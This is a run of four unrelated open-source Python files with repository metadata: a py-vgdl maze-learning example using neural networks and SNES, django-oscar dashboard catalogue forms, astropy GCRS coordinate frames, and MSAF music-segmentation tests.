net.addModule(SigmoidLayer(outdim, name = 'unscaled'))
net.addOutputModule(SoftmaxLayer(outdim, name = 'o'))
net.addConnection(FullConnection(net['i'], net['h']))
net.addConnection(FullConnection(net['bias'], net['h']))
net.addConnection(FullConnection(net['bias'], net['unscaled']))
net.addConnection(FullConnection(net['h'], net['unscaled']))
lconn = LinearConnection(net['unscaled'], net['o'])
lconn._setParameters([1./temperature]*outdim)
# these are fixed.
lconn.paramdim = 0
net.addConnection(lconn)
if recurrent:
net.addRecurrentConnection(FullConnection(net['h'], net['h']))
net.sortModules()
print net
print 'number of parameters', net.paramdim
return net
def test1():
from examples.gridphysics.mazes import polarmaze_game, maze_level_1
game_str, map_str = polarmaze_game, maze_level_1
g = VGDLParser().parseGame(game_str)
g.buildLevel(map_str)
game_env = GameEnvironment(g)
print 'number of observations:', game_env.outdim
net = buildNet(game_env.outdim, 2, 2)
for i in range(200):
net.randomize()
net.reset()
print someEpisodes(game_env, net),
if i% 20 == 19:
print
def plotBackground(env, known=[[]]):
if len(known[0]) == 0:
from vgdl.mdpmap import MDPconverter
g = env._game
C = MDPconverter(g, env=env, verbose=False)
_, R, _ = C.convert()
size = (g.width, g.height)
known[0].append((size, C.states, R))
featurePlot(*known[0][0])
def plotTrajectories(env, net, num_traj=5):
cols = ['r', 'c', 'b', 'g', 'y']
for ci in range(num_traj):
fit, alls = someEpisodes(env, net, returnEvents=True)
print fit, len(alls),
if len(alls) == 0:
print 'Oops?'
continue
sseq = [s for s, _, _ in alls]+[alls[-1][-1]]
addTrajectory(sseq, cols[ci%len(cols)])
print
def test2():
from examples.gridphysics.mazes import polarmaze_game, maze_level_1
from pybrain.optimization import SNES
game_str, map_str = polarmaze_game, maze_level_1
g = VGDLParser().parseGame(game_str)
g.buildLevel(map_str)
game_env = GameEnvironment(g, actionDelay=100, recordingEnabled=True)
net = buildNet(game_env.outdim, 6, 2)
algo = SNES(lambda x: someEpisodes(game_env, x), net, verbose=True, desiredEvaluation=0.43)
rows, cols = 3,3
episodesPerStep = 2
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
net._setParameters(algo.bestEvaluable)
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
def test3():
from examples.gridphysics.mazes.simple import office_layout_2, consistent_corridor
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(consistent_corridor)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 4, 4, temperature=0.05, recurrent=False)
algo = SNES(lambda x: someEpisodes(game_env, x), net, verbose=True, desiredEvaluation=0.78)
rows, cols = 2,2
episodesPerStep = 3
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
net._setParameters(algo.bestEvaluable)
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
# a maze with loops, and simple reactive solution (stay left)
labyrinth2 = """
wwwwwwwwwwwww
w ww ww
w wwww w
w w wwAww ww
w w wwwwGw w
w w ww w
w ww ww w
w w ww
wwwwwwwwwwwww
"""
def test4():
from numpy import ndarray
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES, WeightGuessing
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(labyrinth2)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 5, 4, temperature=0.1, recurrent=False)
algo = SNES(lambda x: someEpisodes(game_env, x, avgOver=3), net, verbose=True, desiredEvaluation=0.75)
#algo = WeightGuessing(lambda x: someEpisodes(game_env, x), net, verbose=True, desiredEvaluation=0.78)
rows, cols = 2,2
episodesPerStep = 4
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
if isinstance(algo.bestEvaluable, ndarray):
net._setParameters(algo.bestEvaluable)
else:
net = algo.bestEvaluable
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
def test5():
from numpy import ndarray
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(labyrinth2)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 6, 4, temperature=0.1, recurrent=False)
algo = SNES(lambda x: someEpisodes(game_env, x, avgOver=3, maxSteps=50), net, verbose=True, desiredEvaluation=0.75)
print algo.batchSize
rows, cols = 2,2
episodesPerStep = 5
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
if isinstance(algo.bestEvaluable, ndarray):
net._setParameters(algo.bestEvaluable)
else:
net = algo.bestEvaluable
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
# a maze that requires memory
cheese_maze = """
wwwwwwwwww
w w
w w ww w w
w wGww wAw
wwwwwwwwww
"""
def test6():
""" Now with memory!"""
from numpy import ndarray
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(cheese_maze)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 10, 4, temperature=0.1, recurrent=True)
algo = SNES(lambda x: someEpisodes(game_env, x, avgOver=6, maxSteps=30, exploretoo=False), net, verbose=True, desiredEvaluation=0.85)
print algo.batchSize
rows, cols = 2,3
episodesPerStep = 5
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
if isinstance(algo.bestEvaluable, ndarray):
net._setParameters(algo.bestEvaluable)
else:
net = algo.bestEvaluable
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
if __name__ == '__main__':
#test1()
#test2()
#test3()
#test4()
#test5()
test6()
| {
"content_hash": "3b1320b6a3a765b13efd82dcd3210f20",
"timestamp": "",
"source": "github",
"line_count": 288,
"max_line_length": 156,
"avg_line_length": 33.229166666666664,
"alnum_prop": 0.6478578892371996,
"repo_name": "iKrishneel/py-vgdl",
"id": "5c59a20076fb070fbf199ba2388389bf03b31b82",
"size": "9570",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/learning/nomodel_pomdp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "246712"
}
],
"symlink_target": ""
} |
from django import forms
from django.core import exceptions
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from treebeard.forms import movenodeform_factory
from oscar.core.loading import get_class, get_model
from oscar.core.utils import slugify
from oscar.forms.widgets import ImageInput
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
ProductAttribute = get_model('catalogue', 'ProductAttribute')
Category = get_model('catalogue', 'Category')
StockRecord = get_model('partner', 'StockRecord')
ProductCategory = get_model('catalogue', 'ProductCategory')
ProductImage = get_model('catalogue', 'ProductImage')
ProductRecommendation = get_model('catalogue', 'ProductRecommendation')
ProductSelect = get_class('dashboard.catalogue.widgets', 'ProductSelect')
CategoryForm = movenodeform_factory(
Category,
fields=['name', 'description', 'image'])
class ProductClassSelectForm(forms.Form):
"""
Form which is used before creating a product to select it's product class
"""
product_class = forms.ModelChoiceField(
label=_("Create a new product of type"),
empty_label=_("-- Choose type --"),
queryset=ProductClass.objects.all())
def __init__(self, *args, **kwargs):
"""
If there's only one product class, pre-select it
"""
super(ProductClassSelectForm, self).__init__(*args, **kwargs)
qs = self.fields['product_class'].queryset
if not kwargs.get('initial') and len(qs) == 1:
self.fields['product_class'].initial = qs[0]
class ProductSearchForm(forms.Form):
upc = forms.CharField(max_length=16, required=False, label=_('UPC'))
title = forms.CharField(
max_length=255, required=False, label=_('Product title'))
def clean(self):
cleaned_data = super(ProductSearchForm, self).clean()
cleaned_data['upc'] = cleaned_data['upc'].strip()
cleaned_data['title'] = cleaned_data['title'].strip()
return cleaned_data
class StockRecordForm(forms.ModelForm):
def __init__(self, product_class, user, *args, **kwargs):
# The user kwarg is not used by stock StockRecordForm. We pass it
# anyway in case one wishes to customise the partner queryset
self.user = user
super(StockRecordForm, self).__init__(*args, **kwargs)
# Restrict accessible partners for non-staff users
if not self.user.is_staff:
self.fields['partner'].queryset = self.user.partners.all()
# If not tracking stock, we hide the fields
if not product_class.track_stock:
for field_name in ['num_in_stock', 'low_stock_treshold']:
if field_name in self.fields:
del self.fields[field_name]
else:
for field_name in ['price_excl_tax', 'num_in_stock']:
if field_name in self.fields:
self.fields[field_name].required = True
class Meta:
model = StockRecord
fields = [
'partner', 'partner_sku',
'price_currency', 'price_excl_tax', 'price_retail', 'cost_price',
'num_in_stock', 'low_stock_threshold',
]
BaseStockRecordFormSet = inlineformset_factory(
Product, StockRecord, form=StockRecordForm, extra=1)
class StockRecordFormSet(BaseStockRecordFormSet):
def __init__(self, product_class, user, *args, **kwargs):
self.user = user
self.require_user_stockrecord = not user.is_staff
self.product_class = product_class
if not user.is_staff and \
'instance' in kwargs and \
'queryset' not in kwargs:
kwargs.update({
'queryset': StockRecord.objects.filter(product=kwargs['instance'],
partner__in=user.partners.all())
})
super(StockRecordFormSet, self).__init__(*args, **kwargs)
self.set_initial_data()
def set_initial_data(self):
"""
If user has only one partner associated, set the first
stock record's partner to it. Can't pre-select for staff users as
they're allowed to save a product without a stock record.
This is intentionally done after calling __init__ as passing initial
data to __init__ creates a form for each list item. So depending on
whether we can pre-select the partner or not, we'd end up with 1 or 2
forms for an unbound form.
"""
if self.require_user_stockrecord:
try:
user_partner = self.user.partners.get()
except (exceptions.ObjectDoesNotExist,
exceptions.MultipleObjectsReturned):
pass
else:
partner_field = self.forms[0].fields.get('partner', None)
if partner_field and partner_field.initial is None:
partner_field.initial = user_partner
def _construct_form(self, i, **kwargs):
kwargs['product_class'] = self.product_class
kwargs['user'] = self.user
return super(StockRecordFormSet, self)._construct_form(
i, **kwargs)
def clean(self):
"""
If the user isn't a staff user, this validation ensures that at least
one stock record's partner is associated with a users partners.
"""
if any(self.errors):
return
if self.require_user_stockrecord:
stockrecord_partners = set([form.cleaned_data.get('partner', None)
for form in self.forms])
user_partners = set(self.user.partners.all())
if not user_partners & stockrecord_partners:
raise exceptions.ValidationError(
_("At least one stock record must be set to a partner that"
" you're associated with."))
def _attr_text_field(attribute):
return forms.CharField(label=attribute.name,
required=attribute.required)
def _attr_textarea_field(attribute):
return forms.CharField(label=attribute.name,
widget=forms.Textarea(),
required=attribute.required)
def _attr_integer_field(attribute):
return forms.IntegerField(label=attribute.name,
required=attribute.required)
def _attr_boolean_field(attribute):
return forms.BooleanField(label=attribute.name,
required=attribute.required)
def _attr_float_field(attribute):
return forms.FloatField(label=attribute.name,
required=attribute.required)
def _attr_date_field(attribute):
return forms.DateField(label=attribute.name,
required=attribute.required,
widget=forms.widgets.DateInput)
def _attr_option_field(attribute):
return forms.ModelChoiceField(
label=attribute.name,
required=attribute.required,
queryset=attribute.option_group.options.all())
def _attr_multi_option_field(attribute):
return forms.ModelMultipleChoiceField(
label=attribute.name,
required=attribute.required,
queryset=attribute.option_group.options.all())
def _attr_entity_field(attribute):
# Product entities don't have out-of-the-box supported in the ProductForm.
# There is no ModelChoiceField for generic foreign keys, and there's no
# good default behaviour anyway; offering a choice of *all* model instances
# is hardly useful.
return None
def _attr_numeric_field(attribute):
return forms.FloatField(label=attribute.name,
required=attribute.required)
def _attr_file_field(attribute):
return forms.FileField(
label=attribute.name, required=attribute.required)
def _attr_image_field(attribute):
return forms.ImageField(
label=attribute.name, required=attribute.required)
class ProductForm(forms.ModelForm):
FIELD_FACTORIES = {
"text": _attr_text_field,
"richtext": _attr_textarea_field,
"integer": _attr_integer_field,
"boolean": _attr_boolean_field,
"float": _attr_float_field,
"date": _attr_date_field,
"option": _attr_option_field,
"multi_option": _attr_multi_option_field,
"entity": _attr_entity_field,
"numeric": _attr_numeric_field,
"file": _attr_file_field,
"image": _attr_image_field,
}
class Meta:
model = Product
fields = [
'title', 'upc', 'description', 'is_discountable', 'structure']
widgets = {
'structure': forms.HiddenInput()
}
def __init__(self, product_class, data=None, parent=None, *args, **kwargs):
self.set_initial(product_class, parent, kwargs)
super(ProductForm, self).__init__(data, *args, **kwargs)
if parent:
self.instance.parent = parent
# We need to set the correct product structures explicitly to pass
# attribute validation and child product validation. Note that
# those changes are not persisted.
self.instance.structure = Product.CHILD
self.instance.parent.structure = Product.PARENT
self.delete_non_child_fields()
else:
# Only set product class for non-child products
self.instance.product_class = product_class
self.add_attribute_fields(product_class, self.instance.is_parent)
if 'title' in self.fields:
self.fields['title'].widget = forms.TextInput(
attrs={'autocomplete': 'off'})
def set_initial(self, product_class, parent, kwargs):
"""
Set initial data for the form. Sets the correct product structure
and fetches initial values for the dynamically constructed attribute
fields.
"""
if 'initial' not in kwargs:
kwargs['initial'] = {}
self.set_initial_attribute_values(product_class, kwargs)
if parent:
kwargs['initial']['structure'] = Product.CHILD
def set_initial_attribute_values(self, product_class, kwargs):
"""
Update the kwargs['initial'] value to have the initial values based on
the product instance's attributes
"""
instance = kwargs.get('instance')
if instance is None:
return
for attribute in product_class.attributes.all():
try:
value = instance.attribute_values.get(
attribute=attribute).value
except exceptions.ObjectDoesNotExist:
pass
else:
kwargs['initial']['attr_%s' % attribute.code] = value
def add_attribute_fields(self, product_class, is_parent=False):
"""
For each attribute specified by the product class, this method
dynamically adds form fields to the product form.
"""
for attribute in product_class.attributes.all():
field = self.get_attribute_field(attribute)
if field:
self.fields['attr_%s' % attribute.code] = field
# Attributes are not required for a parent product
if is_parent:
self.fields['attr_%s' % attribute.code].required = False
def get_attribute_field(self, attribute):
"""
Gets the correct form field for a given attribute type.
"""
return self.FIELD_FACTORIES[attribute.type](attribute)
def delete_non_child_fields(self):
"""
Deletes any fields not needed for child products. Override this if
you want to e.g. keep the description field.
"""
for field_name in ['description', 'is_discountable']:
if field_name in self.fields:
del self.fields[field_name]
def _post_clean(self):
"""
Set attributes before ModelForm calls the product's clean method
(which it does in _post_clean), which in turn validates attributes.
"""
self.instance.attr.initiate_attributes()
for attribute in self.instance.attr.get_all_attributes():
field_name = 'attr_%s' % attribute.code
# An empty text field won't show up in cleaned_data.
if field_name in self.cleaned_data:
value = self.cleaned_data[field_name]
setattr(self.instance.attr, attribute.code, value)
super(ProductForm, self)._post_clean()
class StockAlertSearchForm(forms.Form):
status = forms.CharField(label=_('Status'))
class ProductCategoryForm(forms.ModelForm):
class Meta:
model = ProductCategory
fields = ('category', )
BaseProductCategoryFormSet = inlineformset_factory(
Product, ProductCategory, form=ProductCategoryForm, extra=1,
can_delete=True)
class ProductCategoryFormSet(BaseProductCategoryFormSet):
def __init__(self, product_class, user, *args, **kwargs):
# This function just exists to drop the extra arguments
super(ProductCategoryFormSet, self).__init__(*args, **kwargs)
def clean(self):
if not self.instance.is_child and self.get_num_categories() == 0:
raise forms.ValidationError(
_("Stand-alone and parent products "
"must have at least one category"))
if self.instance.is_child and self.get_num_categories() > 0:
raise forms.ValidationError(
_("A child product should not have categories"))
def get_num_categories(self):
num_categories = 0
for i in range(0, self.total_form_count()):
form = self.forms[i]
if (hasattr(form, 'cleaned_data')
and form.cleaned_data.get('category', None)
and not form.cleaned_data.get('DELETE', False)):
num_categories += 1
return num_categories
class ProductImageForm(forms.ModelForm):
class Meta:
model = ProductImage
fields = ['product', 'original', 'caption']
# use ImageInput widget to create HTML displaying the
# actual uploaded image and providing the upload dialog
# when clicking on the actual image.
widgets = {
'original': ImageInput(),
}
def save(self, *args, **kwargs):
# We infer the display order of the image based on the order of the
# image fields within the formset.
kwargs['commit'] = False
obj = super(ProductImageForm, self).save(*args, **kwargs)
obj.display_order = self.get_display_order()
obj.save()
return obj
def get_display_order(self):
return self.prefix.split('-').pop()
BaseProductImageFormSet = inlineformset_factory(
Product, ProductImage, form=ProductImageForm, extra=2)
class ProductImageFormSet(BaseProductImageFormSet):
def __init__(self, product_class, user, *args, **kwargs):
super(ProductImageFormSet, self).__init__(*args, **kwargs)
class ProductRecommendationForm(forms.ModelForm):
class Meta:
model = ProductRecommendation
fields = ['primary', 'recommendation', 'ranking']
widgets = {
'recommendation': ProductSelect,
}
def __init__(self, *args, **kwargs):
super(ProductRecommendationForm, self).__init__(*args, **kwargs)
self.fields['recommendation'].widget.attrs['class'] = "select2"
BaseProductRecommendationFormSet = inlineformset_factory(
Product, ProductRecommendation, form=ProductRecommendationForm,
extra=5, fk_name="primary")
class ProductRecommendationFormSet(BaseProductRecommendationFormSet):
def __init__(self, product_class, user, *args, **kwargs):
super(ProductRecommendationFormSet, self).__init__(*args, **kwargs)
class ProductClassForm(forms.ModelForm):
class Meta:
model = ProductClass
fields = ['name', 'requires_shipping', 'track_stock', 'options']
class ProductAttributesForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ProductAttributesForm, self).__init__(*args, **kwargs)
# because we'll allow submission of the form with blank
# codes so that we can generate them.
self.fields["code"].required = False
self.fields["option_group"].help_text = _("Select an option group")
def clean_code(self):
code = self.cleaned_data.get("code")
title = self.cleaned_data.get("name")
if not code and title:
code = slugify(title)
return code
class Meta:
model = ProductAttribute
fields = ["name", "code", "type", "option_group", "required"]
ProductAttributesFormSet = inlineformset_factory(ProductClass,
ProductAttribute,
form=ProductAttributesForm,
extra=3)
| {
"content_hash": "c47858ea8f156c4c176df57571053073",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 87,
"avg_line_length": 35.80962343096234,
"alnum_prop": 0.6164631652742887,
"repo_name": "okfish/django-oscar",
"id": "bc93f02d44d7b89d50904e18fa369a414c6ee298",
"size": "17117",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/oscar/apps/dashboard/catalogue/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "542048"
},
{
"name": "HTML",
"bytes": "498872"
},
{
"name": "JavaScript",
"bytes": "423552"
},
{
"name": "Makefile",
"bytes": "2653"
},
{
"name": "Python",
"bytes": "1738863"
},
{
"name": "Shell",
"bytes": "2751"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, unicode_literals, division,
print_function)
from ... import units as u
from ..representation import SphericalRepresentation
from ..baseframe import (BaseCoordinateFrame, RepresentationMapping,
TimeFrameAttribute,
CartesianRepresentationFrameAttribute)
from .utils import DEFAULT_OBSTIME, EQUINOX_J2000
class GCRS(BaseCoordinateFrame):
"""
A coordinate or frame in the Geocentric Celestial Reference System (GCRS).
GCRS is distinct form ICRS mainly in that it is relative to the Earth's
center-of-mass rather than the solar system Barycenter. That means this
frame includes the effects of aberration (unlike ICRS). For more background
on the GCRS, see the references provided in the
:ref:`astropy-coordinates-seealso` section of the documentation. (Of
particular note is Section 1.2 of
`USNO Circular 179 <http://aa.usno.navy.mil/publications/docs/Circular_179.php>`_)
This frame also includes frames that are defined *relative* to the Earth,
but that are offset (in both position and velocity) from the Earth.
This frame has these frame attributes:
* ``obstime``
The time at which the observation is taken. Used for determining the
position of the Earth.
* ``obsgeoloc``
The position of the observer relative to the center-of-mass of the
Earth, oriented the same as BCRS/ICRS. Either [0, 0, 0],
`~astropy.coordinates.CartesianRepresentation`, or proper input for one,
i.e., a `~astropy.units.Quantity` with shape (3, ...) and length units.
Defaults to [0, 0, 0], meaning "true" GCRS.
* ``obsgeovel``
The velocity of the observer relative to the center-of-mass of the
Earth, oriented the same as BCRS/ICRS. Either [0, 0, 0],
`~astropy.coordinates.CartesianRepresentation`, or proper input for one,
i.e., a `~astropy.units.Quantity` with shape (3, ...) and velocity
units. Defaults to [0, 0, 0], meaning "true" GCRS.
Parameters
----------
representation : `BaseRepresentation` or None
A representation object or None to have no data (or use the other keywords)
ra : `Angle`, optional, must be keyword
The RA for this object (``dec`` must also be given and ``representation``
must be None).
dec : `Angle`, optional, must be keyword
The Declination for this object (``ra`` must also be given and
``representation`` must be None).
distance : `~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
(``representation`` must be None).
copy : bool, optional
If `True` (default), make copies of the input coordinate arrays.
Can only be passed in as a keyword argument.
"""
frame_specific_representation_info = {
'spherical': [RepresentationMapping('lon', 'ra'),
RepresentationMapping('lat', 'dec')]
}
frame_specific_representation_info['unitspherical'] = \
frame_specific_representation_info['spherical']
default_representation = SphericalRepresentation
obstime = TimeFrameAttribute(default=DEFAULT_OBSTIME)
obsgeoloc = CartesianRepresentationFrameAttribute(default=[0, 0, 0],
unit=u.m)
obsgeovel = CartesianRepresentationFrameAttribute(default=[0, 0, 0],
unit=u.m/u.s)
# The "self-transform" is defined in icrs_cirs_transformations.py, because in
# the current implementation it goes through ICRS (like CIRS)
class PrecessedGeocentric(BaseCoordinateFrame):
"""
A coordinate frame defined in a similar manner as GCRS, but precessed to a
requested (mean) equinox. Note that this does *not* end up the same as
regular GCRS even for J2000 equinox, because the GCRS orientation is fixed
to that of ICRS, which is not quite the same as the dynamical J2000
orientation.
This frame has these frame attributes:
* ``equinox``
The (mean) equinox to precess the coordinates to.
* ``obstime``
The time at which the observation is taken. Used for determining the
position of the Earth.
* ``obsgeoloc``
The position of the observer relative to the center-of-mass of the Earth,
oriented the same as BCRS/ICRS. Either [0, 0, 0], `~astropy.coordinates.CartesianRepresentation`,
or proper input for one, i.e., a `~astropy.units.Quantity` with shape (3, ...) and length units.
Defaults to [0, 0, 0], meaning "true" Geocentric.
* ``obsgeovel``
The velocity of the observer relative to the center-of-mass of the Earth,
oriented the same as BCRS/ICRS. Either 0, `~astropy.coordinates.CartesianRepresentation`,
or proper input for one, i.e., a `~astropy.units.Quantity` with shape (3, ...) and velocity units.
Defaults to [0, 0, 0], meaning "true" Geocentric.
Parameters
----------
representation : `BaseRepresentation` or None
A representation object or None to have no data (or use the other keywords)
ra : `Angle`, optional, must be keyword
The RA for this object (``dec`` must also be given and ``representation``
must be None).
dec : `Angle`, optional, must be keyword
The Declination for this object (``ra`` must also be given and
``representation`` must be None).
distance : `~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
(``representation`` must be None).
copy : bool, optional
If `True` (default), make copies of the input coordinate arrays.
Can only be passed in as a keyword argument.
"""
frame_specific_representation_info = {
'spherical': [RepresentationMapping('lon', 'ra'),
RepresentationMapping('lat', 'dec')]
}
frame_specific_representation_info['unitspherical'] = \
frame_specific_representation_info['spherical']
default_representation = SphericalRepresentation
equinox = TimeFrameAttribute(default=EQUINOX_J2000)
obstime = TimeFrameAttribute(default=DEFAULT_OBSTIME)
obsgeoloc = CartesianRepresentationFrameAttribute(default=[0, 0, 0], unit=u.m)
obsgeovel = CartesianRepresentationFrameAttribute(default=[0, 0, 0], unit=u.m/u.s)
| {
"content_hash": "2cc599a398bb1fdebf10547a60bc4550",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 106,
"avg_line_length": 46.827338129496404,
"alnum_prop": 0.6656936549393148,
"repo_name": "tbabej/astropy",
"id": "12e995b24f2b91752c512b7ea9ddedb5eb64696f",
"size": "6597",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "astropy/coordinates/builtin_frames/gcrs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "366874"
},
{
"name": "C++",
"bytes": "1825"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Jupyter Notebook",
"bytes": "62553"
},
{
"name": "Python",
"bytes": "7610601"
},
{
"name": "Shell",
"bytes": "425"
},
{
"name": "TeX",
"bytes": "778"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
matplotlib.rcParams.update(matplotlib.rcParamsDefault)
import matplotlib.style
matplotlib.style.use('seaborn-ticks')
from mpl_ic import image_comparison
from nose.tools import assert_raises
from nose.tools import raises
import numpy.testing as npt
import os
from types import ModuleType
# Msaf imports
import msaf
from msaf.features import Features
from msaf.exceptions import (NoHierBoundaryError, FeaturesNotFound,
NoAudioFileError)
# Global vars
audio_file = os.path.join("fixtures", "chirp.mp3")
long_audio_file = os.path.join("fixtures", "Sargon_test", "audio",
"Mindless_cut.mp3")
fake_module_name = "fake_name_module"
def test_get_boundaries_module():
# Check that it returns modules for all the existing MSAF boundaries algos
bound_ids = msaf.io.get_all_boundary_algorithms()
for bound_id in bound_ids:
bound_module = msaf.run.get_boundaries_module(bound_id)
assert isinstance(bound_module, ModuleType)
# Check that "gt" returns None
assert msaf.run.get_boundaries_module("gt") is None
# Check that a AttributeError is raised when calling it with non-existent
# boundary id
assert_raises(RuntimeError,
msaf.run.get_boundaries_module, fake_module_name)
# Check that a RuntimeError is raised when calling it with invalid
# boundary id
assert_raises(RuntimeError,
msaf.run.get_boundaries_module, "fmc2d")
def test_get_labels_module():
# Check that it returns modules for all the existing MSAF boundaries algos
label_ids = msaf.io.get_all_label_algorithms()
for label_id in label_ids:
label_module = msaf.run.get_labels_module(label_id)
assert isinstance(label_module, ModuleType)
# Check that None returns None
assert msaf.run.get_labels_module(None) is None
# Check that a AttributeError is raised when calling it with non-existent
# labels id
assert_raises(RuntimeError,
msaf.run.get_labels_module, fake_module_name)
# Check that a RuntimeError is raised when calling it with invalid
# labels id
assert_raises(RuntimeError,
msaf.run.get_labels_module, "foote")
def test_run_algorithms():
"""Test running all the algorithms."""
bound_ids = msaf.io.get_all_boundary_algorithms()
label_ids = msaf.io.get_all_label_algorithms()
# Add ground truth to boundary id
bound_ids += ["gt"]
# Add None to labels
label_ids += [None]
# Config params
feature = "pcp"
annot_beats = False
framesync = False
file_struct = msaf.io.FileStruct(audio_file)
file_struct.features_file = msaf.config.features_tmp_file
# Running all algorithms on a file that is too short
for bound_id in bound_ids:
for label_id in label_ids:
print("bound_id: %s,\tlabel_id: %s" % (bound_id, label_id))
config = msaf.io.get_configuration(feature, annot_beats, framesync,
bound_id, label_id)
config["hier"] = False
config["features"] = Features.select_features(
feature, file_struct, annot_beats, framesync)
est_times, est_labels = msaf.run.run_algorithms(
file_struct, bound_id, label_id, config)
assert len(est_times) == 2
assert len(est_labels) == 1
npt.assert_almost_equal(est_times[0], 0.0, decimal=2)
npt.assert_almost_equal(est_times[-1], config["features"].dur,
decimal=2)
# Commpute and save features for long audio file
file_struct = msaf.io.FileStruct(long_audio_file)
file_struct.features_file = msaf.config.features_tmp_file
def _test_run_msaf(bound_id, label_id, hier=False):
print("bound_id: %s,\tlabel_id: %s" % (bound_id, label_id))
config = msaf.io.get_configuration(feature, annot_beats, framesync,
bound_id, label_id)
config["hier"] = hier
config["features"] = Features.select_features(
feature, file_struct, annot_beats, framesync)
est_times, est_labels = msaf.run.run_algorithms(
file_struct, bound_id, label_id, config)
# Take the first level if hierarchy algorithm
if hier:
est_times = est_times[0]
est_labels = est_labels[0]
npt.assert_almost_equal(est_times[0], 0.0, decimal=2)
assert len(est_times) - 1 == len(est_labels)
npt.assert_almost_equal(est_times[-1], config["features"].dur,
decimal=2)
# Running all boundary algorithms on a relatively long file
# Combining boundaries with labels
for bound_id in bound_ids:
if bound_id == "gt":
continue
for label_id in label_ids:
yield (_test_run_msaf, bound_id, label_id, False)
# Test the hierarchical algorithms
hier_ids = ["olda", "scluster"]
for hier_bounds_id in hier_ids:
for hier_labels_id in hier_ids:
if hier_labels_id == "olda":
hier_labels_id = "fmc2d"
yield (_test_run_msaf, hier_bounds_id, hier_labels_id, True)
@raises(NoHierBoundaryError)
def test_no_bound_hierarchical():
msaf.run.run_hierarchical(None, None, None, None, None)
def test_no_gt_flat_bounds():
"""Make sure the results are empty if there is not ground truth found."""
feature = "pcp"
annot_beats = False
framesync = False
file_struct = msaf.io.FileStruct(audio_file)
file_struct.features_file = msaf.config.features_tmp_file
config = {}
config["features"] = Features.select_features(
feature, file_struct, annot_beats, framesync)
est_times, est_labels = msaf.run.run_flat(file_struct, None, None,
None, config, 0)
assert(not est_times)
assert(not est_labels)
def test_process_track():
bounds_id = "foote"
labels_id = None
file_struct = msaf.io.FileStruct(audio_file)
file_struct.features_file = msaf.config.features_tmp_file
file_struct.est_file = "tmp.json"
config = {}
config["feature"] = "pcp"
config["annot_beats"] = False
config["framesync"] = False
config["hier"] = False
est_times, est_labels = msaf.run.process_track(
file_struct, bounds_id, labels_id, config)
assert os.path.isfile(file_struct.est_file)
os.remove(file_struct.est_file)
def test_process_with_gt():
bounds_id = "gt"
labels_id = "fmc2d"
est_times, est_labels = msaf.run.process(
long_audio_file, boundaries_id=bounds_id, labels_id=labels_id)
assert est_times[0] == 0
assert len(est_times) == len(est_labels) + 1
@raises(FeaturesNotFound)
def test_process_wrong_feature():
feature = "caca"
est_times, est_labels = msaf.run.process(long_audio_file, feature=feature)
@raises(NoAudioFileError)
def test_process_wrong_path():
wrong_path = "caca.mp3"
est_times, est_labels = msaf.run.process(wrong_path)
def test_process():
est_times, est_labels = msaf.run.process(long_audio_file)
assert est_times[0] == 0
assert len(est_times) == len(est_labels) + 1
def test_process_sonify():
out_wav = "out_wav.wav"
est_times, est_labels = msaf.run.process(long_audio_file,
sonify_bounds=True,
out_bounds=out_wav)
assert os.path.isfile(out_wav)
os.remove(out_wav)
# TODO: Travis
# @image_comparison(baseline_images=['run_bounds'], extensions=['png'])
# def test_process_plot():
# est_times, est_labels = msaf.run.process(long_audio_file, plot=True)
def test_process_dataset():
ds_path = os.path.join("fixtures", "Sargon_test")
res = msaf.run.process(ds_path)
est_times, est_labels = res[0]
